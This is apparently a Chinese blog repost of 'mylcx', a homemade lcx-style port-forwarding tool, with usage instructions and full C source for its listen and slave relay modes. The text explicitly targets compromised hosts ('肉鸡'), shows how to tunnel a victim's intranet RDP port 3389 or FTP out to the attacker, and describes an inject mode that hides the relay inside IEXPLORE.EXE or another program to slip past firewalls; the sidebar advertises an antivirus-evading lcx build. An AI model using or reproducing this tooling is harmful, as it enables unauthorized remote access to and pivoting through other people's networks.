mylcx 穿墙版

最新推荐文章于 2019-04-18 01:46:48 发布
最新推荐文章于 2019-04-18 01:46:48 发布
阅读量1.9k 收藏 1
点赞数
文章标签: null socket struct winapi stream tools
 

作者:gaohui

mylcx -listen 这个命令跟lcx一样
mylcx -slave 本机端口 远程ip 远程端口
即把本机端口映射到远程ip的一个端口上

   在本机执行:mylcx -listen 5000 21
   在肉鸡上执行:mylcx -slave 21 你的ip 5000
   然后连接ftp 127.0.0.1 就可以登录远程的ftp了

简单说下第三个参数吧

mylcx -inject port1 remoteip remoteport [-path exepath]

port1是被映射的端口

remoteip 是映射的远程机器

remoteport是远程端口

比如我们想连对方的3389端口,而对方又是内网没法直接连,并且对方又又防火墙普通的lcx没法转发,那就在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000

然后在自己的机器上运行

mylcx -listen 5000 5001

最后打开mstsc,输入127.0.0.1:5001既可连接对方3389端口。

默认的mylcx 会插入到C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE中去运行,我们也可以指定他插入到别的程序里面运行,只要这个程序能允许访问网络,比如说d:\tools\flashfxp.exe,那我们可以在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000 -path "d:\tools\flashfxp.exe"

就可以了,尽情发挥吧。需要注意一点的是,不是所有程序都可以用来插入的,有些程序可能会插入失败或者插入后运行失败,都是有可能的。

附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)

#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment(lib,"Ws2_32")

HANDLE hevent;

typedef struct _s1ands2
{
SOCKET s1;
SOCKET s2;
} s1ands2;

typedef struct _info{
int listenorslave; //1-listen 2-slave
unsigned short listen_port1;
unsigned short listen_port2;
unsigned short slave_local;
char remoteip[16];
unsigned short remoteport;
} info;

DWORD WINAPI s1tos2(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;

SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
   int errorcode;
   bytesdone=recv(s1,buff,2048,0);

   errorcode=GetLastError();
   if(bytesdone<=0)
   //if(bytesdone<=0)
   {
    SetEvent(hevent);
    return 0;
   }
   printf("%d bytes=%d\n",errorcode,bytesdone);
   bytesdone=send(s2,buff,bytesdone,0);
   errorcode=GetLastError();
   //if(errorcode>0)
   if(bytesdone<=0)
   {
    SetEvent(hevent);
    return 0;
   }

}
return 0;

}


/*

DWORD WINAPI s2tos1(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;

SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
   bytesdone=recv(s2,buff,2048,0);
   send(s1,buff,bytesdone,0);
}

return 0;

}


*/


int lcxlisten(unsigned short p1,unsigned short p2)
{
SOCKET s1,s2,rs1,rs2;

unsigned short port1,port2;

int len1,len2;

port1=p1;

port2=p2;

s1=socket(AF_INET,SOCK_STREAM,0);

sockaddr_in addr1,addr2;
sockaddr_in raddr1,raddr2;

addr1.sin_family=AF_INET;

addr1.sin_addr.S_un.S_addr=INADDR_ANY;

addr1.sin_port=htons(port1);

addr2.sin_family=AF_INET;

addr2.sin_addr.S_un.S_addr=INADDR_ANY;

addr2.sin_port=htons(port2);

bind(s1,(const sockaddr *)&addr1,sizeof(addr1));

s2=socket(AF_INET,SOCK_STREAM,0);

bind(s2,(const sockaddr *)&addr2,sizeof(addr2));

listen(s1,5);

listen(s2,5);

len1=sizeof(raddr1);

len2=sizeof(raddr2);

printf("waiting on port %d...\n",port1);

rs1=accept(s1,(struct sockaddr *)&raddr1,&len1);

printf("%s connected\n",inet_ntoa(raddr1.sin_addr));

printf("wating on port %d...\n",port2);

rs2=accept(s2,(struct sockaddr *)&raddr2,&len2);

printf("go...\n");

s1ands2 temp1,temp2;

temp1.s1=rs1;

temp1.s2=rs2;

CreateThread(NULL,NULL,s1tos2,&temp1,NULL,NULL);

temp2.s1=rs2;

temp2.s2=rs1;

CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

hevent=CreateEvent(NULL,false,false,NULL);

//hevent[1]=CreateEvent(NULL,false,false,NULL);

//WaitForMultipleObjects(2,&hevent,false,INFINITE);


WaitForSingleObject(hevent,INFINITE);
printf("end waiting1\n");
CloseHandle(hevent);
closesocket(rs1);
closesocket(rs2);
closesocket(s1);
closesocket(s2);


return 0;
}

int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
WSADATA wsa;

WSAStartup(MAKEWORD(2,2),&wsa);

SOCKET s1,s2;

sockaddr_in addr1,addr2;

addr1.sin_family=AF_INET;

addr1.sin_addr.S_un.S_addr=inet_addr(remoteip);

addr1.sin_port=htons(remoteport);

s1=socket(AF_INET,SOCK_STREAM,0);

if(connect(s1,(const struct sockaddr*)&addr1,sizeof(addr1)))
{
   closesocket(s1);
   return 0;
}

s2=socket(AF_INET,SOCK_STREAM,0);

addr2.sin_family=AF_INET;

addr2.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");

addr2.sin_port=htons(local);

if(connect(s2,(const struct sockaddr*)&addr2,sizeof(addr2)))
{
   closesocket(s1);
   closesocket(s2);
   return 0;
}

s1ands2 temp,temp2;

temp.s1=s1;

temp.s2=s2;

CreateThread(NULL,NULL,s1tos2,&temp,NULL,NULL);

temp2.s1=s2;

temp2.s2=s1;

CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

hevent=CreateEvent(NULL,false,false,NULL);

//hevent[1]=CreateEvent(NULL,false,false,NULL);

//WaitForMultipleObjects(2,&hevent,false,INFINITE);


WaitForSingleObject(hevent,INFINITE);

printf("end waiting2\n");

CloseHandle(hevent);
closesocket(s1);
closesocket(s2);

return 0;
}

int main(int argc, char* argv[])
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
if(argc<2)
{
   printf("usage:mylcx.exe -listen port1 port2\n"
    "mylcx.exe -slave localport remoteip remoteport\n");
   return 0;
}
if(strcmp(argv[1],"-listen")==0)
{
   while(1){
    lcxlisten(atoi(argv[2]),atoi(argv[3]));
    Sleep(1000);
   }
   return 0;
}


if(strcmp(argv[1],"-slave")==0)
{
   while(1)
   {
    lcxslave(atoi(argv[2]),argv[3],atoi(argv[4]));
    Sleep(1000);
   }
   return 0;

}
//lcxlisten(5000,21);
//lcxslave(800,"127.0.0.1",5000);
return 0;
}

cnbird2008
关注
lcx-实用技术
abu1216的博客
01-06 881
1.文件上传和下载如何实现? 文件上传 文件上传的本质是IO流的从操作;客户端: 1.必须使用post,post才能携带大数据 2.必须设置type=“file” name="file"必须要有名字 3.必须要设置enctype="multipart/form-data"服务器端:通过request.getInputStream()获取字节输入流,读取请求正文内容;将上传内容得到,保存在服务器端,就完成了文件上传;实际使用直接用框架中的api就可以,commons-fileupload是apach
【内网学习笔记】7、lcx、netcat和socat的使用
TeamsSix 的 优快云 空间
05-28 816
1、lcx 使用 lcx 分为 Windows 和 Linux ,Linux 叫 portmap Windows 内网端口转发 内网失陷主机 lcx.exe -slave rhost rport lhost lport 公网代理主机 lcx.exe -listen lport1 lport2 内网失陷主机 lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389 公网代理主机 lcx.exe -listen 4444 5555 在建立连接后,访问
2013最新免杀lcx.exe
07-07
20130707过360五引擎,请不要上传桌面等敏感的地方,以免被360上传导致被杀,短期被杀修改MD5即可.
getServerPort(), getLocalPort(), and getRemotePort()的具体含义
09-01 4725
getRemotePort():首先,你可能会问对于谁而言是远程的?在这种情况下,由于是服务器在问,所以客户是远程的。既然客户对服务器是远程的,所以getRemotePort()得到的是发出请求的客户的端口号。 getLocalPort ():获取的是应用服务器的端口,即该应用的实际端口,无论请求经过了多少代理,转发,getLocalPort只取最后的端口,也就是应用的端口 ge...
【内网穿透服务器】使用FRP实现内网穿透,远程访问内网服务器
热门推荐
Deng's Blog
04-18 4万+
本文主要介绍了FRP的搭建及不同目的下的配置方式,以实现内网穿透,远程访问内网服务器。
mylcx穿墙功能
weixin_33796205的博客
08-12 92
web安全系列 mylcx穿墙转自:第零空间ps:如果是防火墙或者是策略的话,你注入到IE或者flashfxp里,应该也是回不来的。思路很好.如果能注入IIS进程里,利用80端口出来,不知道可以不可以。说一下用法吧-slave 和-listen 两个参数同lcx就不多说了简单说下第三个参数把mylcx -inject port1 remoteip remoteport [-...
lcx不能转发ftp解决
收集盒 Book box
01-24 827
<br />上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。<br /><br />我没看过lcx的源码~所以不知道为什么它不能转发ftp<br />下面是我自己写的一个lcx,姑且叫做mylcx吧 !<br /><br />(另外我还弄了一个
lcx端口转发
08-24
命令行下的端口转发工具。<br>用法:lcx -tran port1 ip port2,将本地port1端口转发到IP的port2端口上。
lcx源码分析
ShadowAssassin的专栏
02-10 3637
闲着没事,看到网上找了份lcx的源码看了下。在此简单的分析下。   首先指明下 lcx 核心代码用的网络模型是select选择模型。   这里仅分析了常用的功能代码   -listen port1 port2 -slave ip port1 127.0.0.1 3389   经过分析 ,画出程序大致流程如下。   (图中的buf是共用一片缓冲区,每个机器有两个共用的bu
lcx.exe 精简优化
10-05
lcx.exe, 常用的内网穿透工具, 2015.10.05精简优化, 重构了全部源代码, 大量细节优化, VS2013编译
机械工程中圆锥滚子轴承载荷分布曲线程序及其动力学模型验证 v1.5
05-30
内容概要:本文介绍了一款用于计算圆锥滚子轴承载荷分布曲线的程序。该程序旨在与圆锥滚子轴承的动力学模型(如有限元模型和自建代码动力学模型)进行对比,以验证模型的有效性和准确性。作者基于《滚动轴承设计原理》一书编写了这一程序,并在代码中加入了详尽的注释,便于读者对照书籍进行学习和推导。此外,文中还提供了部分代码片段,展示了如何计算载荷分布并绘制相应的曲线图。最后,作者分享了编写程序的学习心得,强调了这一工具在轴承设计和优化中的重要性。 适合人群:机械工程领域的研究人员和技术人员,尤其是那些对圆锥滚子轴承的载荷分布和动力学模型感兴趣的从业者。 使用场景及目标:① 验证圆锥滚子轴承动力学模型的有效性;② 提供一个实用的工具,帮助理解和优化圆锥滚子轴承的性能;③ 作为教学资源,辅助学生和初学者学习相关理论和编程技巧。 其他说明:本文不仅提供了具体的编程实现方法,还分享了宝贵的学习经验和心得,鼓励读者在实践中不断探索和创新。
基于OpenCV与QT开发的卡尺工具:工具跟随、自动纠偏、图像处理与形状匹配集成应用
05-30
内容概要:本文介绍了基于OpenCV与Qt开发的智能卡尺工具,该工具集成了图像采集、图像处理和自动纠偏功能,旨在提升工业制造中的测量精度和效率。文中详细阐述了系统的架构与功能,包括工具跟随、找线、找圆、颜色检测、形状匹配等高级功能。此外,还讨论了技术实现细节,如形状匹配与找线找圆算法的封装、Qt界面开发以及海康工业相机的集成。最后,强调了该系统作为学习资料的价值,涵盖计算机视觉、图像处理和Qt开发等方面。 适合人群:从事工业自动化、计算机视觉、图像处理和Qt开发的技术人员,尤其是希望深入了解图像处理技术和实际应用场景的研发人员。 使用场景及目标:适用于需要精确测量和图像处理的工业环境,如制造业生产线的质量检测环节。目标是提高测量精度和效率,减少人为误差。 其他说明:该系统不仅是一个实用的测量工具,也是一个宝贵的学习资源,提供了完整的源码和技术文档,有助于开发者深入理解和掌握相关技术。
MATLAB Simulink中两相交错并联双向DC-DC变换器的双闭环控制仿真及性能分析 · 仿真分析
最新发布
05-30
内容概要:本文详细探讨了两相交错并联双向DC-DC变换器在MATLAB/Simulink环境下的电压电流双闭环控制仿真模型。文中介绍了基于4mos结构的变换器模型,并对其三种控制方式——单电压环开环控制、单电流环闭环控制和电压电流双闭环控制进行了详细的仿真和性能对比。研究表明,双闭环控制在电感电流均流、输出波形平滑度和电压纹波抑制等方面表现最优,显著提高了系统的稳定性和效率。 适合人群:从事电力电子领域的研究人员和技术人员,尤其是对DC-DC变换器及其控制策略感兴趣的读者。 使用场景及目标:适用于需要深入了解DC-DC变换器控制策略的研究人员和技术人员,帮助他们选择最合适的控制方式以提升系统性能。 其他说明:本文提供了丰富的仿真数据和图表,有助于读者直观地理解不同控制方式的效果。此外,附有参考文献,方便读者进一步查阅相关资料。
实训商业源码-PHP项目管理软件源码-毕业设计.zip
05-30
实训商业源码-PHP项目管理软件源码-毕业设计.zip
金融领域基于DeepSeek的股票交易自动化系统:人工智能深度学习量化交易策略与风险管理
05-30
内容概要:本文介绍了DeepSeek这款基于人工智能的量化交易软件实现股票交易自动化的成功案例。DeepSeek通过深度学习算法分析市场数据,预测股票价格走势并自动执行交易。使用前需要注册登录平台、连接交易账户、了解基本操作。接着,用户可以根据个人需求定制交易策略,包括数据分析、策略设计(如移动平均线策略)、回测等步骤。文中还强调了风险管理的重要性,如设置止损止盈点、仓位控制等措施。最后,在完成策略设计和风险管理后,可开启自动化交易,并定期监控交易结果,根据市场变化调整策略。; 适合人群:对股票交易自动化感兴趣的投资者,尤其是希望利用人工智能和深度学习技术优化交易策略的人士。; 使用场景及目标:①帮助用户理解DeepSeek软件的操作流程;②指导用户如何根据个人需求定制交易策略;③强调风险管理在自动化交易中的重要性;④介绍自动化交易的启动及监控方法。; 阅读建议:阅读时应重点关注DeepSeek的工作原理、策略定制的具体步骤以及风险管理的方法,同时结合示例代码进行实践操作,以便更好地掌握股票交易自动化的技巧。
PFC砂样二维直剪实验:代码解析与曲线分析助力岩土工程仿真 - 颗粒流仿真 宝典
05-30
内容概要:本文详细介绍了PFC(Particle Flow Code)案例7关于砂样二维直剪实验的内容。首先展示了代码源文件的关键部分,包括模型初始化、砂样创建、直剪力施加、模拟运行和结果输出。接着,通过对应力-应变曲线的分析,揭示了砂样在不同应变阶段的力学特性及其破坏模式。最后,总结了PFC在岩土工程仿真的应用价值,并对其未来发展进行了展望。 适合人群:从事岩土工程研究和技术开发的专业人士,尤其是对颗粒流仿真感兴趣的科研人员和工程师。 使用场景及目标:适用于需要理解和掌握PFC软件操作及砂样二维直剪实验原理的人群。目标是帮助读者深入了解砂样的力学行为,为实际工程项目提供理论支持和技术指导。 其他说明:本文不仅提供了详细的代码解析,还结合了具体的曲线分析,使读者能够全面理解整个实验过程。同时,文中提到的应力-应变曲线对于评估材料性能至关重要,有助于预测和防止工程事故的发生。
探索和预测社交行为和性格类型数据集( 2,900 行和 8 列)CSV
05-30
深入研究外向与内向人格特质数据集,这是一个丰富的行为和社会数据集合,旨在探索人类性格的范围。该数据集捕获了外向和内向的关键指标,使其成为心理学家、数据科学家和研究社交行为、性格预测或数据预处理技术的研究人员的宝贵资源。 外向和内向等人格特征塑造了个人与社会环境的互动方式。此数据集提供了对独处时间、社交活动参加和社交媒体参与等行为的见解,从而支持在心理学、社会学、营销和机器学习中的应用。无论您是预测性格类型还是分析社交模式,此数据集都是您发现迷人见解的门户。 数据集详细信息:数据集包含 2,900 行和 8 列。
实训商业源码-小家电电器类网站源码-毕业设计.zip
05-30
实训商业源码-小家电电器类网站源码-毕业设计.zip
基于MATLAB实现的变分模态分解方法研究
05-30
变分模态分解(Variational Mode Decomposition, VMD)是一种强大的非线性、无参数信号处理技术,专门用于复杂非平稳信号的分析与分解。它由Eckart Dietz和Herbert Krim于2011年提出,主要针对传统傅立叶变换在处理非平稳信号时的不足。VMD的核心思想是将复杂信号分解为一系列模态函数(即固有模态函数,IMFs),每个IMF具有独特的频率成分和局部特性。这一过程与小波分析或经验模态分解(EMD)类似,但VMD通过变分优化框架显著提升了分解的稳定性和准确性。 在MATLAB环境中实现VMD,可以帮助我们更好地理解和应用这一技术。其核心算法主要包括以下步骤:首先进行初始化,设定模态数并为每个模态分配初始频率估计;接着采用交替最小二乘法,通过交替最小化残差平方和以及模态频率的离散时间傅立叶变换(DTFT)约束,更新每个模态函数和中心频率;最后通过迭代优化,在每次迭代中优化所有IMF的幅度和相位,直至满足停止条件(如达到预设迭代次数或残差平方和小于阈值)。 MATLAB中的VMD实现通常包括以下部分:数据预处理,如对原始信号进行归一化或去除直流偏置,以简化后续处理;定义VMD结构,设置模态数、迭代次数和约束参数等;VMD算法主体,包含初始化、交替最小二乘法和迭代优化过程;以及后处理,对分解结果进行评估和可视化,例如计算每个模态的频谱特性,绘制IMF的时频分布图。如果提供了一个包含VMD算法的压缩包文件,其中的“VMD”可能是MATLAB代码文件或完整的项目文件夹,可能包含主程序、函数库、示例数据和结果可视化脚本。通过运行这些代码,可以直观地看到VMD如何将复杂信号分解为独立模态,并理解每个模态的物理意义。 VMD在多个领域具有广泛的应用,包括信号处理(如声学、振动、生物医学信号分析)、图像处理(如图像去噪、特征提取)、金融时间序列分析(识
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值